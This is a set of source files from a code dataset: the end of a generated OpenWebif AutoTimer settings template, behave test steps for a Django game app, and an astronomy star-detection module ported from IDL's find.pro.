\t\t<span style="display: block;clear: both;"/>
\t\t</div>
\t\t</div>
\t</div>
\t</div>
\t</div>
</div>
<div id="simdlg" style="display:none;">
<div style="font-size:smaller;">
<table id="simt" border="0" class="ui-widget" style="margin:3px;width:100%;">
<thead class="ui-widget-header">
<tr><th>''')
_v = VFFSL(SL,"tstrings",True)['name'] # u"$tstrings['name']" on line 254, col 9
if _v is not None: write(_filter(_v, rawExpr=u"$tstrings['name']")) # from line 254, col 9.
write(u'''</th><th>''')
_v = VFFSL(SL,"tstrings",True)['title'] # u"$tstrings['title']" on line 254, col 35
if _v is not None: write(_filter(_v, rawExpr=u"$tstrings['title']")) # from line 254, col 35.
write(u'''</th><th>''')
_v = VFFSL(SL,"tstrings",True)['channel'] # u"$tstrings['channel']" on line 254, col 62
if _v is not None: write(_filter(_v, rawExpr=u"$tstrings['channel']")) # from line 254, col 62.
write(u'''</th><th>''')
_v = VFFSL(SL,"tstrings",True)['start'] # u"$tstrings['start']" on line 254, col 91
if _v is not None: write(_filter(_v, rawExpr=u"$tstrings['start']")) # from line 254, col 91.
write(u'''</th><th>''')
_v = VFFSL(SL,"tstrings",True)['end'] # u"$tstrings['end']" on line 254, col 118
if _v is not None: write(_filter(_v, rawExpr=u"$tstrings['end']")) # from line 254, col 118.
write(u'''</th></tr>
</thead>
<tbody id=\'simtb\' class="ui-widget-content">
</tbody>
</table>
</div>
</div>
<div id="timerdlg" style="display:none;">
<div id="timerdlgcont">
</div>
<div>
<div id="atsettingdlg" style="display:none;">
<div id="atsettingdlgcont">
<form>
<fieldset>
<label for="ats_autopoll">''')
_v = VFFSL(SL,"tstrings",True)['ats_autopoll'] # u"$tstrings['ats_autopoll']" on line 271, col 27
if _v is not None: write(_filter(_v, rawExpr=u"$tstrings['ats_autopoll']")) # from line 271, col 27.
write(u''':</label>
<input type="checkbox" name="ats_autopoll" id="ats_autopoll" value="" class="checkbox ui-widget-content ui-corner-all">
<label for="ats_interval">''')
_v = VFFSL(SL,"tstrings",True)['ats_interval'] # u"$tstrings['ats_interval']" on line 273, col 27
if _v is not None: write(_filter(_v, rawExpr=u"$tstrings['ats_interval']")) # from line 273, col 27.
write(u''':</label>
<input type="text" size="5" name="ats_interval" id="ats_interval" class="text ui-widget-content ui-corner-all">
<label for="ats_maxdaysinfuture">''')
_v = VFFSL(SL,"tstrings",True)['ats_maxdaysinfuture'] # u"$tstrings['ats_maxdaysinfuture']" on line 275, col 34
if _v is not None: write(_filter(_v, rawExpr=u"$tstrings['ats_maxdaysinfuture']")) # from line 275, col 34.
write(u''':</label>
<input type="text" size="5" name="ats_maxdaysinfuture" id="ats_maxdaysinfuture" class="text ui-widget-content ui-corner-all">
<br><label for="ats_try_guessing">''')
_v = VFFSL(SL,"tstrings",True)['ats_try_guessing'] # u"$tstrings['ats_try_guessing']" on line 277, col 35
if _v is not None: write(_filter(_v, rawExpr=u"$tstrings['ats_try_guessing']")) # from line 277, col 35.
write(u''':</label>
<input type="checkbox" name="ats_try_guessing" id="ats_try_guessing" value="" class="checkbox ui-widget-content ui-corner-all">
<label for="ats_fastscan">''')
_v = VFFSL(SL,"tstrings",True)['ats_fastscan'] # u"$tstrings['ats_fastscan']" on line 279, col 27
if _v is not None: write(_filter(_v, rawExpr=u"$tstrings['ats_fastscan']")) # from line 279, col 27.
write(u''':</label>
<input type="checkbox" name="ats_fastscan" id="ats_fastscan" value="" class="checkbox ui-widget-content ui-corner-all">
<label for="ats_show_in_extensionsmenu">''')
_v = VFFSL(SL,"tstrings",True)['ats_show_in_extensionsmenu'] # u"$tstrings['ats_show_in_extensionsmenu']" on line 281, col 41
if _v is not None: write(_filter(_v, rawExpr=u"$tstrings['ats_show_in_extensionsmenu']")) # from line 281, col 41.
write(u''':</label>
<input type="checkbox" name="ats_show_in_extensionsmenu" id="ats_show_in_extensionsmenu" value="" class="checkbox ui-widget-content ui-corner-all">
<br><label for="ats_disabled_on_conflict">''')
_v = VFFSL(SL,"tstrings",True)['ats_disabled_on_conflict'] # u"$tstrings['ats_disabled_on_conflict']" on line 283, col 43
if _v is not None: write(_filter(_v, rawExpr=u"$tstrings['ats_disabled_on_conflict']")) # from line 283, col 43.
write(u''':</label>
<input type="checkbox" name="ats_disabled_on_conflict" id="ats_disabled_on_conflict" value="" class="checkbox ui-widget-content ui-corner-all">
<label for="ats_addsimilar_on_conflict">''')
_v = VFFSL(SL,"tstrings",True)['ats_addsimilar_on_conflict'] # u"$tstrings['ats_addsimilar_on_conflict']" on line 285, col 41
if _v is not None: write(_filter(_v, rawExpr=u"$tstrings['ats_addsimilar_on_conflict']")) # from line 285, col 41.
write(u''':</label>
<input type="checkbox" name="ats_addsimilar_on_conflict" id="ats_addsimilar_on_conflict" value="" class="checkbox ui-widget-content ui-corner-all">
<br><label for="ats_notifconflict">''')
_v = VFFSL(SL,"tstrings",True)['ats_notifconflict'] # u"$tstrings['ats_notifconflict']" on line 287, col 36
if _v is not None: write(_filter(_v, rawExpr=u"$tstrings['ats_notifconflict']")) # from line 287, col 36.
write(u''':</label>
<input type="checkbox" name="ats_notifconflict" id="ats_notifconflict" value="" class="checkbox ui-widget-content ui-corner-all">
<label for="ats_notifsimilar">''')
_v = VFFSL(SL,"tstrings",True)['ats_notifsimilar'] # u"$tstrings['ats_notifsimilar']" on line 289, col 31
if _v is not None: write(_filter(_v, rawExpr=u"$tstrings['ats_notifsimilar']")) # from line 289, col 31.
write(u''':</label>
<input type="checkbox" name="ats_notifsimilar" id="ats_notifsimilar" value="" class="checkbox ui-widget-content ui-corner-all">
<br><label for="ats_add_autotimer_to_tags">''')
_v = VFFSL(SL,"tstrings",True)['ats_add_autotimer_to_tags'] # u"$tstrings['ats_add_autotimer_to_tags']" on line 291, col 44
if _v is not None: write(_filter(_v, rawExpr=u"$tstrings['ats_add_autotimer_to_tags']")) # from line 291, col 44.
write(u''':</label>
<input type="checkbox" name="ats_add_autotimer_to_tags" id="ats_add_autotimer_to_tags" value="" class="checkbox ui-widget-content ui-corner-all">
<label for="ats_add_name_to_tags">''')
_v = VFFSL(SL,"tstrings",True)['ats_add_name_to_tags'] # u"$tstrings['ats_add_name_to_tags']" on line 293, col 35
if _v is not None: write(_filter(_v, rawExpr=u"$tstrings['ats_add_name_to_tags']")) # from line 293, col 35.
write(u''':</label>
<input type="checkbox" name="ats_add_name_to_tags" id="ats_add_name_to_tags" value="" class="checkbox ui-widget-content ui-corner-all">
<br><label for="ats_refresh">''')
_v = VFFSL(SL,"tstrings",True)['ats_refresh'] # u"$tstrings['ats_refresh']" on line 296, col 30
if _v is not None: write(_filter(_v, rawExpr=u"$tstrings['ats_refresh']")) # from line 296, col 30.
write(u''':</label>
<select id="ats_refresh" name="ats_refresh" size="1">
\t\t\t\t<option value="none" selected="selected">''')
_v = VFFSL(SL,"tstrings",True)['ats_refresh_none'] # u"$tstrings['ats_refresh_none']" on line 298, col 46
if _v is not None: write(_filter(_v, rawExpr=u"$tstrings['ats_refresh_none']")) # from line 298, col 46.
write(u'''</option>
\t\t\t\t<option value="auto" selected="selected">''')
_v = VFFSL(SL,"tstrings",True)['ats_refresh_auto'] # u"$tstrings['ats_refresh_auto']" on line 299, col 46
if _v is not None: write(_filter(_v, rawExpr=u"$tstrings['ats_refresh_auto']")) # from line 299, col 46.
write(u'''</option>
\t\t\t\t<option value="all" selected="selected">''')
_v = VFFSL(SL,"tstrings",True)['ats_refresh_all'] # u"$tstrings['ats_refresh_all']" on line 300, col 45
if _v is not None: write(_filter(_v, rawExpr=u"$tstrings['ats_refresh_all']")) # from line 300, col 45.
write(u'''</option>
</select>
<label for="ats_editor">''')
_v = VFFSL(SL,"tstrings",True)['ats_editor'] # u"$tstrings['ats_editor']" on line 303, col 25
if _v is not None: write(_filter(_v, rawExpr=u"$tstrings['ats_editor']")) # from line 303, col 25.
write(u'''</label>
<select id="ats_editor" name="ats_editor" size="1">
\t\t\t<option value="plain" selected="selected">''')
_v = VFFSL(SL,"tstrings",True)['ats_editor_plain'] # u"$tstrings['ats_editor_plain']" on line 305, col 46
if _v is not None: write(_filter(_v, rawExpr=u"$tstrings['ats_editor_plain']")) # from line 305, col 46.
write(u'''</option>
\t\t\t<option value="wizzard" selected="selected">''')
_v = VFFSL(SL,"tstrings",True)['ats_editor_wizzard'] # u"$tstrings['ats_editor_wizzard']" on line 306, col 48
if _v is not None: write(_filter(_v, rawExpr=u"$tstrings['ats_editor_wizzard']")) # from line 306, col 48.
write(u'''</option>
</select>
</fieldset>
</form>
</div>
<div>
<script type="text/javascript" src="/js/jquery-ui-timepicker-addon.min.js"></script>
<script type="text/javascript" src="/js/chosen.jquery.min.js"></script>
<script type="text/javascript" src="/js/at.js"></script>
<script type="text/javascript">
$(function() { InitPage();});
</script>
<link rel="stylesheet" type="text/css" href="/css/chosen.min.css" />
''')
_filter = self._CHEETAH__currentFilter = _orig_filter_54425158
########################################
## END - generated method body
return _dummyTrans and trans.response().getvalue() or ""
##################################################
## CHEETAH GENERATED ATTRIBUTES
_CHEETAH__instanceInitialized = False
_CHEETAH_version = __CHEETAH_version__
_CHEETAH_versionTuple = __CHEETAH_versionTuple__
_CHEETAH_genTime = __CHEETAH_genTime__
_CHEETAH_genTimestamp = __CHEETAH_genTimestamp__
_CHEETAH_src = __CHEETAH_src__
_CHEETAH_srcLastModified = __CHEETAH_srcLastModified__
_mainCheetahMethod_for_at= 'respond'
## END CLASS DEFINITION
if not hasattr(at, '_initCheetahAttributes'):
templateAPIClass = getattr(at, '_CHEETAH_templateClass', Template)
templateAPIClass._addCheetahPlumbingCodeToClass(at)
# CHEETAH was developed by Tavis Rudd and Mike Orr
# with code, advice and input from many other volunteers.
# For more information visit http://www.CheetahTemplate.org/
##################################################
## if run from command line:
if __name__ == '__main__':
from Cheetah.TemplateCmdLineIface import CmdLineIface
CmdLineIface(templateObj=at()).run()
|
MOA-2011/e2openplugin-OpenWebif
|
plugin/controllers/views/ajax/at.py
|
Python
|
gpl-2.0
| 47,524
|
[
"VisIt"
] |
1bafb8f35bdebf278aad86ccaca1f4359163cfd0309a5e91b42299f886631204
|
import time
from urlparse import urljoin
from behave import use_step_matcher, given, then
use_step_matcher("re")
@given('I am on (?:the )?page with relative url "(?P<url>.*)"')
def step_impl(context, url):
full_url = urljoin(context.config.server_url, url)
context.browser.visit(full_url)
@then('I should (?P<not_>not )?be on (?:the )?page with relative url "(?P<url>.*)"')
def step_impl(context, not_, url):
time.sleep(1)
full_url = urljoin(context.config.server_url, url)
if not_:
assert not context.browser.url == full_url, "Expected not to be on page %s, instead got %s" % (
full_url, context.browser.url)
else:
assert context.browser.url == full_url, "Expected to be on page %s, instead got %s" % (
full_url, context.browser.url)
@given('a (?P<super_>super )?user with username "(?P<username>.*)" and password "(?P<password>.*)"')
def step_impl(context, super_, username, password):
from django.contrib.auth.models import User, Group
group, _ = Group.objects.get_or_create(name='Users')
group.save()
if super_:
u = User.objects.create_superuser(username=username, email="test@test.com", password=password)
u.save()
else:
u = User(username=username, email='foo@example.com')
u.set_password(password)
u.save()
@given('an inactive user with username "(?P<username>.*)" and password "(?P<password>.*)"')
def step_impl(context, username, password):
from django.contrib.auth.models import User
u = User(username=username, email='foo1@example.com')
u.set_password(password)
u.is_active = False
u.save()
|
mc706/prog-strat-game
|
core/features/steps/helpers.py
|
Python
|
mit
| 1,657
|
[
"VisIt"
] |
e31a7ec4ff2ab4a98c901e0b3f1edf3ad89a3d3f788f881fe10f6bd438a36328
|
try:
from stsci.convolve import convolve2d
except ImportError:
from convolve import convolve2d
import math
#from numpy import *
from numpy import sum,array,shape, maximum, arange, exp, where, ravel, zeros, int8, float32, int32
from numpy import minimum, transpose,mean, delete
import os
import pyfits as pf
import time
#------------------------------------------------------------------------------
from astrodata.adutils import paramutil
#------------------------------------------------------------------------------
#def detSources( image, outfile="", verbose=False, sigma=0.0, threshold=2.5, fwhm=5.5,
def detSources( image="", hdu=None, outfile="", verbose=False, sigma=0.0, threshold=2.5, fwhm=5.5,
sharplim=[0.2,1.0], roundlim=[-1.0,1.0], window=None, exts=None,
timing=False, grid=False, rejection=None, ratio=None, drawWindows=False,
dispFrame=1 ):
"""
Performs similar to the source detecting algorithm
'http://idlastro.gsfc.nasa.gov/ftp/pro/idlphot/find.pro'.
References:
This code is heavily influenced by 'http://idlastro.gsfc.nasa.gov/ftp/pro/idlphot/find.pro'.
'find.pro' was written by W. Landsman, STX February, 1987.
This code was converted to Python with areas re-written for optimization by:
River Allen, Gemini Observatory, December 2009. riverallen@gmail.com
Revisions:
NZ - Feb 2011. Taken out of iqtools. Added hdu and listed the numpy functions instead.
- added peakIntensity (flux) as output.
:param image: The filename of the fits file. It must be in the format N2.fits[1]
for the specific extension. (i.e.) If you want to find objects only in
the image extension [1], than you would pass N2.fits[1].
:type filename: String
:param outfile: The name of the file where the output will be written. By default
output will not be written (ie if outfile is left as "", no output file is written).
:type outfile: String
:param verbose: Print out non-critical and debug information.
:type verbose: Boolean [False]
:param sigma: The mean of the background value. If nothing is passed,
detSources will run background() to determine it.
:type sigma: Number [0.0]
:param threshold: "Threshold intensity for a point source - should generally
be 3 or 4 sigma above background RMS"[1]. It was found that 2.5
works best for IQ source detection.
:type threshold: Number [2.5]
:param fwhm: "FWHM to be used in the convolve filter"[1]. This ends up playing a factor in
determining the size of the kernel put through the gaussian convolve.
:type fwhm: Number [5.5]
:param sharplim: "2 element vector giving low and high cutoff for the sharpness
statistic (Default: [0.2,1.0] ). Change this default only if the stars
have significantly larger or smaller concentration than a Gaussian"[1]
:type sharplim: 2-Element List of Numbers. [0.2,1.0]
:param roundlim:
"2 element vector giving low and high cutoff for the roundness
statistic (Default: [-1.0,1.0] ). Change this default only if the stars
are significantly elongated."[1]
:type roundlim: 2-Element List of Numbers. [-1.0,1.0]
:param window:
Rectangle regions of the data to process. detSources will only
look at the data within windows passed, if a window is passed. If no
window is set, detSources will look at the entire image.
Beware: small objects on the edges of the windows may not be detected.
:type window: List of 4 dimensional tuples [None]
::
General Coordinate Form:
( x_offset, y_offset, width, height )
(x_offset + width, y_offset + height)
__________ /
| Window |
|__________|
/
(x_offset, y_offset)
Example:
Window=[(0,0,200,200)]: Looks at a window of size 200, 200 in bottom left corner
Window=[(0,0,halfWidth,Height),(halfWidth,0,halfWidth,Height)]: Splits the image in 2,
divided vertically down the middle.
:param timing: If timing is set to true, the return type for detSources will be a tuple.
The tuple is of the form (xyArray, overalltime) where overalltime represents
the time it took detSources to run minus any displaying time. This feature is
for engineering purposes.
:type timing: Boolean [False]
:param grid: If no window is set, detSources will run the image in a grid.
This is supposed to work in conjunction with rejection.
:type grid: Boolean [False]
:param rejection: Rejection functions to be run on each grid point. See baseHeuristic() for an example.
:type rejection: A list of rejection functions [None]
:param ratio: What the ratio or grid size should be. Ratio of 5 means the image will
be split up into a 5x5 grid. Should be modified to take fixe grid size (50,50), for example.
:type ratio: int [None]
:param drawWindows: If this is set to True, will attempt to draw the windows using
iraf.tvmark(). Beware: a ds9 must be running.
:type drawWindows: Boolean [False]
:param dispFrame: This works in conjunction with drawWindows.
debug=False, grid=False, rejection=None, ratio=None, drawWindows=False,
dispFrame=1
:returns: A list of centroids. For example:
:rtype: A 2-D list.
"""
#===========================================================================
# Parameter Checking
#===========================================================================
# image = paramutil.checkParam( image, str, "" )
if not hdu:
if image == "":
raise "daoFind requires an image file."
imageName, exts = paramutil.checkFileFitExtension( image )
if verbose:
print "Opening and Loading: %s[%d]"% (imageName,exts)
hdu = pf.open( imageName )
if exts is None:
# May want to include astrodata here to deal with
# all 'SCI' extensions, etc.
exts = 1
sciData = hdu[exts].data
else:
sciData = hdu.data
if window is not None:
if type(window) == tuple:
window = [window]
elif type(window) == list:
pass
else:
raise "'window' must be a tuple of length 4, or a list of tuples length 4."
for wind in window:
if type(wind) == tuple:
if len(wind) == 4:
continue
else:
raise 'A window tuple has incorrect information, %s, require x,y,width,height' %(str(wind))
else:
raise 'The window list contains a non-tuple. %s' %(str(wind))
if type( exts ) != int and exts is not None:
raise 'exts must be int or None.'
# outfile = paramutil.checkParam( outfile, str, "" )
writeOutFlag = False
if outfile != "":
writeOutFlag = True
# fwhm = paramutil.checkParam( fwhm, type(0.0), 5.5, 0.0 )
# verbose = paramutil.checkParam( verbose, bool, False )
if len(sharplim) < 2:
raise "Sharplim parameter requires 2 num elements. (i.e. [0.2,1.0])"
if len(roundlim) < 2:
raise "Roundlim parameter requires 2 num elements. (i.e. [-1.0,1.0])"
if verbose:
print "Opened and loaded."
#------------------------------------------------------------------------------
#===========================================================================
# Setup
#===========================================================================
ost = time.time()
maxConvSize = 13 #Maximum size of convolution box in pixels
radius = maximum(0.637 * fwhm, 2.001) #Radius is 1.5 sigma
radiusSQ = radius ** 2
kernelHalfDimension = minimum(array(radius, copy=0).astype(int32), (maxConvSize - 1) / 2)
kernelDimension = 2 * kernelHalfDimension + 1 # Dimension of the kernel or "convolution box"
sigSQ = (fwhm / 2.35482) ** 2
# Mask identifies valid pixels in convolution box
mask = zeros([kernelDimension, kernelDimension], int8)
# g will contain Gaussian convolution kernel
gauss = zeros([kernelDimension, kernelDimension], float32)
row2 = (arange(kernelDimension) - kernelHalfDimension) ** 2
for i in arange(0, (kernelHalfDimension)+(1)):
temp = row2 + i ** 2
gauss[kernelHalfDimension - i] = temp
gauss[kernelHalfDimension + i] = temp
mask = array(gauss <= radiusSQ, copy=0).astype(int32) #MASK is complementary to SKIP in Stetson's Fortran
good = where(ravel(mask))[0] #Value of c are now equal to distance to center
pixels = good.size
# Compute quantities for centroid computations that can be used for all stars
gauss = exp(-0.5 * gauss / sigSQ)
"""
In fitting Gaussians to the marginal sums, pixels will arbitrarily be
assigned weights ranging from unity at the corners of the box to
kernelHalfDimension^2 at the center (e.g. if kernelDimension = 5 or 7, the weights will be
1 2 3 4 3 2 1
1 2 3 2 1 2 4 6 8 6 4 2
2 4 6 4 2 3 6 9 12 9 6 3
3 6 9 6 3 4 8 12 16 12 8 4
2 4 6 4 2 3 6 9 12 9 6 3
1 2 3 2 1 2 4 6 8 6 4 2
1 2 3 4 3 2 1
respectively). This is done to desensitize the derived parameters to
possible neighboring, brighter stars.[1]
"""
xwt = zeros([kernelDimension, kernelDimension], float32)
wt = kernelHalfDimension - abs(arange(kernelDimension).astype(float32) - kernelHalfDimension) + 1
for i in arange(0, kernelDimension):
xwt[i] = wt
ywt = transpose(xwt)
sgx = sum(gauss * xwt, 1)
sumOfWt = sum(wt)
sgy = sum(gauss * ywt, 0)
sumgx = sum(wt * sgy)
sumgy = sum(wt * sgx)
sumgsqy = sum(wt * sgy * sgy)
sumgsqx = sum(wt * sgx * sgx)
vec = kernelHalfDimension - arange(kernelDimension).astype(float32)
dgdx = sgy * vec
dgdy = sgx * vec
sdgdxs = sum(wt * dgdx ** 2)
sdgdx = sum(wt * dgdx)
sdgdys = sum(wt * dgdy ** 2)
sdgdy = sum(wt * dgdy)
sgdgdx = sum(wt * sgy * dgdx)
sgdgdy = sum(wt * sgx * dgdy)
kernel = gauss * mask #Convolution kernel now in c
sumc = sum(kernel)
sumcsq = sum(kernel ** 2) - (sumc ** 2 / pixels)
sumc = sumc / pixels
# The reason for the flatten is because IDL and numpy treat statements like arr[index], where index
# is an array, differently. For example, arr.shape = (100,100), in IDL index=[400], arr[index]
# would work. In numpy you need to flatten in order to get the arr[4][0] you want.
kshape = kernel.shape
kernel = kernel.flatten()
kernel[good] = (kernel[good] - sumc) / sumcsq
kernel.shape = kshape
# Using row2 here is pretty confusing (From IDL code)
# row2 will be something like: [1 2 3 2 1]
c1 = exp(-.5 * row2 / sigSQ)
sumc1 = sum(c1) / kernelDimension
sumc1sq = sum(c1 ** 2) - sumc1
c1 = (c1 - sumc1) / sumc1sq
mask[kernelHalfDimension,kernelHalfDimension] = 0 # From now on we exclude the central pixel
pixels = pixels - 1 # so the number of valid pixels is reduced by 1
# What this operation looks like:
# ravel(mask) = [0 0 1 1 1 0 0 0 1 1 1 1 1 0 1 1 1 1 1 1 1 1 1 1 0 1 ...]
# where(ravel(mask)) = (array([ 2, 3, 4, 8, 9, 10, 11, 12, 14, ...]),)
good = where(ravel(mask))[0] # "good" identifies position of valid pixels
# x and y coordinate of valid pixels
xx = (good % kernelDimension) - kernelHalfDimension
# relative to the center
yy = array(good / kernelDimension, copy=0).astype(int32) - kernelHalfDimension
#------------------------------------------------------------------------------
#===========================================================================
# Extension and Window / Grid
#===========================================================================
xyArray = []
outputLines = []
if sigma <= 0.0:
sigma = background( sciData )
if verbose:
print 'Estimated Background:', sigma
hmin = sigma * threshold
if window is None:
# Make the window the entire image
window = [(0,0,sciData.shape[1],sciData.shape[0])]
if grid:
ySciDim, xSciDim = sciData.shape
xgridsize = int(xSciDim / ratio)
ygridsize = int(ySciDim / ratio)
window = []
for ypos in range(ratio):
for xpos in range(ratio):
window.append( (xpos * xgridsize, ypos * ygridsize, xgridsize, ygridsize) )
drawtime = 0
if drawWindows:
drawtime = draw_windows( window, dispFrame, label=True)
if rejection is None:
rejection = []
elif rejection is 'default':
rejection = [baseHeuristic]
windName = 0
for wind in window:
windName += 1
subXYArray = []
##@@TODO check for negative values, check that dimensions don't violate overall dimensions.
yoffset, xoffset, yDimension, xDimension = wind
if verbose:
print 'x,y,w,h', xoffset, yoffset, xDimension, yDimension
print '='*50
print 'W' + str(windName)
print '='*50
sciSection = sciData[xoffset:xoffset+xDimension,yoffset:yoffset+yDimension]
#=======================================================================
# Quickly determine if a window is worth processing
#=======================================================================
rejFlag = False
for rejFunc in rejection:
if rejFunc(sciSection, sigma, threshold):
rejFlag = True
break
if rejFlag:
# Reject
continue
#------------------------------------------------------------------------------
#===========================================================================
# Convolve
#===========================================================================
if verbose:
print "Beginning convolution of image"
st = time.time()
h = convolve2d( sciSection, kernel ) # Convolve image with kernel
et = time.time()
if verbose:
print 'Convole Time:', ( et-st )
if not grid:
h[0:kernelHalfDimension,:] = 0
h[xDimension - kernelHalfDimension:xDimension,:] = 0
h[:,0:kernelHalfDimension] = 0
h[:,yDimension - kernelHalfDimension:yDimension] = 0
if verbose:
print "Finished convolution of image"
#------------------------------------------------------------------------------
#===========================================================================
# Filter
#===========================================================================
offset = yy * xDimension + xx
index = where(ravel(h >= hmin))[0] # Valid image pixels are greater than hmin
nfound = index.size
if nfound > 0: # Any maxima found?
h = h.flatten()
for i in arange(pixels):
# Needs to be changed
try:
stars = where(ravel(h[index] >= h[index+ offset[i]]))[0]
except:
break
nfound = stars.size
if nfound == 0: # Do valid local maxima exist?
if verbose:
print "No objects found."
break
index = index[stars]
h.shape = (xDimension, yDimension)
ix = index % yDimension # X index of local maxima
iy = index / yDimension # Y index of local maxima
ngood = index.size
else:
if verbose:
print "No objects above hmin (%s) were found." %(str(hmin))
continue
# Loop over star positions; compute statistics
st = time.time()
for i in arange(ngood):
temp = array(sciSection[iy[i] - kernelHalfDimension:(iy[i] + kernelHalfDimension)+1,
ix[i] - kernelHalfDimension:(ix[i] + kernelHalfDimension)+1])
pixIntensity = h[iy[i],ix[i]] # pixel intensity
# Compute Sharpness statistic
#@@FIXME: This should do proper checking...the issue is an out of range index with kernelhalf and temp
# IndexError: index (3) out of range (0<=index<=0) in dimension 0
try:
sharp1 = (temp[kernelHalfDimension,kernelHalfDimension] - (sum(mask * temp)) / pixels) / pixIntensity
except:
continue
if (sharp1 < sharplim[0]) or (sharp1 > sharplim[1]):
# Reject
# not sharp enough?
continue
dx = sum(sum(temp, 1) * c1)
dy = sum(sum(temp, 0) * c1)
if (dx <= 0) or (dy <= 0):
# Reject
continue
around = 2 * (dx - dy) / (dx + dy) # Roundness statistic
# Reject if not within specified roundness boundaries.
if (around < roundlim[0]) or (around > roundlim[1]):
# Reject
continue
"""
Centroid computation: The centroid computation was modified in Mar 2008 and
now differs from DAOPHOT which multiplies the correction dx by 1/(1+abs(dx)).
The DAOPHOT method is more robust (e.g. two different sources will not merge)
especially in a package where the centroid will be subsequently be
redetermined using PSF fitting. However, it is less accurate, and introduces
biases in the centroid histogram. The change here is the same made in the
IRAF DAOFIND routine (see
http://iraf.net/article.php?story=7211&query=daofind ) [1]
"""
sd = sum(temp * ywt, 0)
sumgd = sum(wt * sgy * sd)
sumd = sum(wt * sd)
sddgdx = sum(wt * sd * dgdx)
hx = (sumgd - sumgx * sumd / sumOfWt) / (sumgsqy - sumgx ** 2 / sumOfWt)
# HX is the height of the best-fitting marginal Gaussian. If this is not
# positive then the centroid does not make sense. [1]
if (hx <= 0):
# Reject
continue
skylvl = (sumd - hx * sumgx) / sumOfWt
dx = (sgdgdx - (sddgdx - sdgdx * (hx * sumgx + skylvl * sumOfWt))) / (hx * sdgdxs / sigSQ)
if abs(dx) >= kernelHalfDimension:
# Reject
continue
xcen = ix[i] + dx #X centroid in original array
# Find Y centroid
sd = sum(temp * xwt, 1)
sumgd = sum(wt * sgx * sd)
sumd = sum(wt * sd)
sddgdy = sum(wt * sd * dgdy)
hy = (sumgd - sumgy * sumd / sumOfWt) / (sumgsqx - sumgy ** 2 / sumOfWt)
if (hy <= 0):
# Reject
continue
skylvl = (sumd - hy * sumgy) / sumOfWt
dy = (sgdgdy - (sddgdy - sdgdy * (hy * sumgy + skylvl * sumOfWt))) / (hy * sdgdys / sigSQ)
if abs(dy) >= kernelHalfDimension:
# Reject
continue
ycen = iy[i] + dy #Y centroid in original array
subXYArray.append( [xcen, ycen, pixIntensity] )
et = time.time()
if verbose:
print 'Looping over Stars time:', ( et - st )
subXYArray = averageEachCluster( subXYArray, 10 )
xySize = len(subXYArray)
for i in range( xySize ):
subXYArray[i] = subXYArray[i].tolist()
# I have no idea why the positions are slightly modified. Was done originally in
# iqTool, perhaps for minute correcting.
subXYArray[i][0] += 1
subXYArray[i][1] += 1
subXYArray[i][0] += yoffset
subXYArray[i][1] += xoffset
if writeOutFlag:
outputLines.append( " ".join( [str(subXYArray[i][0]), str(subXYArray[i][1])] )+"\n" )
xyArray.extend(subXYArray)
oet = time.time()
overall_time = (oet-ost-drawtime)
if verbose:
print 'No. of objects detected:', len(xyArray)
print 'Overall time:', overall_time, 'seconds.'
if writeOutFlag:
outputFile = open( outfile, "w" )
outputFile.writelines( outputLines )
outputFile.close()
if timing:
return xyArray, overall_time
else:
return xyArray
#------------------------------------------------------------------------------
def averageEachCluster( xyArray, pixApart=10.0 ):
"""
detSources can produce multiple centers for an object. This algorithm corrects that
For Example:
626.645599527 179.495974369
626.652254706 179.012831637
626.664059364 178.930738423
626.676504143 178.804093054
626.694643376 178.242374891
This function will try to cluster these close points together, and produce a single center by
taking the mean of the cluster. This function is based off the removeNeighbors function in iqUtil.py
:param xyArray: The list of centers of found stars.
:type xyArray: List
:param pixApart: The max pixels apart for a star to be considered part of a cluster.
:type pixApart: Number
:return: The centroids of the stars sorted by the X dimension.
:rtype: List
"""
newXYArray = []
xyArray.sort()
xyArray = array( xyArray )
xyArrayForMean = []
xyClusterFlag = False
j = 0
while j < (xyArray.shape[0]):
i = j + 1
while i < xyArray.shape[0]:
diffx = xyArray[j][0] - xyArray[i][0]
if abs(diffx) < pixApart:
diffy = xyArray[j][1] - xyArray[i][1]
if abs(diffy) < pixApart:
if not xyClusterFlag:
xyClusterFlag = True
xyArrayForMean.append(j)
xyArrayForMean.append(i)
i = i + 1
else:
break
if xyClusterFlag:
xyMean = [mean( xyArray[xyArrayForMean], axis=0 ), mean( xyArray[xyArrayForMean], axis=1 )]
newXYArray.append( xyMean[0] )
xyArrayForMean.reverse() # Almost equivalent to reverse, except for numpy
for removeIndex in xyArrayForMean:
xyArray = delete( xyArray, removeIndex, 0 )
xyArrayForMean = []
xyClusterFlag = False
j = j - 1
else:
newXYArray.append( xyArray[j] )
j = j + 1
return newXYArray
#------------------------------------------------------------------------------
def baseHeuristic( scidata, sigma, threshold ):
'''
A simple heuristic for rejecting empty grids or grids with only cosmic rays.
:param scidata: The gridpoint data.
:type scidata: numpy.array
:param sigma: The background value for the image.
:type sigma: float
:param threshold: The threshold used by detSources.
:type threshold: int or float
:return: True if the grid is worth rejection.
:rtype: Boolean
'''
stars = starCandidates(scidata, background*sigma)
if stars.size < 20:
return True
return False
#---------------------------------------------------------------------------
def starCandidates(scidata, mean=None):
"""
Find all pixels greater than mean.
:param scidata: Science data for checking.
:type scidata: numpy.array
:return: A list of all points greater than mean.
:rtype: numpy.array
"""
stars = []
if mean is None:
sci_copy = scidata[:,:]
stars = where(sci_copy > (scidata.std() + scidata.mean()))
else:
stars = where(scidata > mean)
return stars[0]
#------------------------------------------------------------------------------
def background(scidata):
"""mask out all pixels greater than 2.5 sigma
:param scidata: science data array, containing only the object to be fit
:type scidata: numpy.array
"""
fim = []
stars = []
fim = scidata * 1.
stars = where(fim > (1*scidata.std() + scidata.mean()))
fim[stars] = scidata.mean()
#nd.display(fim, frame=3)
outside = where(fim < (1*scidata.std() - scidata.mean()))
fim[outside] = scidata.mean()
#nd.display(scidata, frame=2)
#nd.display(fim, frame=4)
return fim.std()
#------------------------------------------------------------------------------
def draw_windows( window, dispFrame=1, label=True ):
'''
'''
import pyraf
from pyraf import iraf
drawst = time.time()
tmpFilename = 'tmpfile.tmp'
index = 0
for win in window:
index += 1
# The following is annoying IRAF file nonsense.
tmpFile = open( tmpFilename, 'w' )
toWrite = '%s %s W%s\n' %(str(win[0]+(win[2]/2)),str(win[1]+(win[3]/2)), str(index))
tmpFile.write( toWrite )
tmpFile.close()
iraf.tvmark( frame=dispFrame,coords=tmpFilename, mark='rectangle',
pointsize=8, color=204, label=label, lengths=str(win[2])+' '+str(float(win[3])/float(win[2])) )
drawet = time.time()
return drawet - drawst
|
pyrrho314/recipesystem
|
trunk/devel/fluxcal/detSources.py
|
Python
|
mpl-2.0
| 27,056
|
[
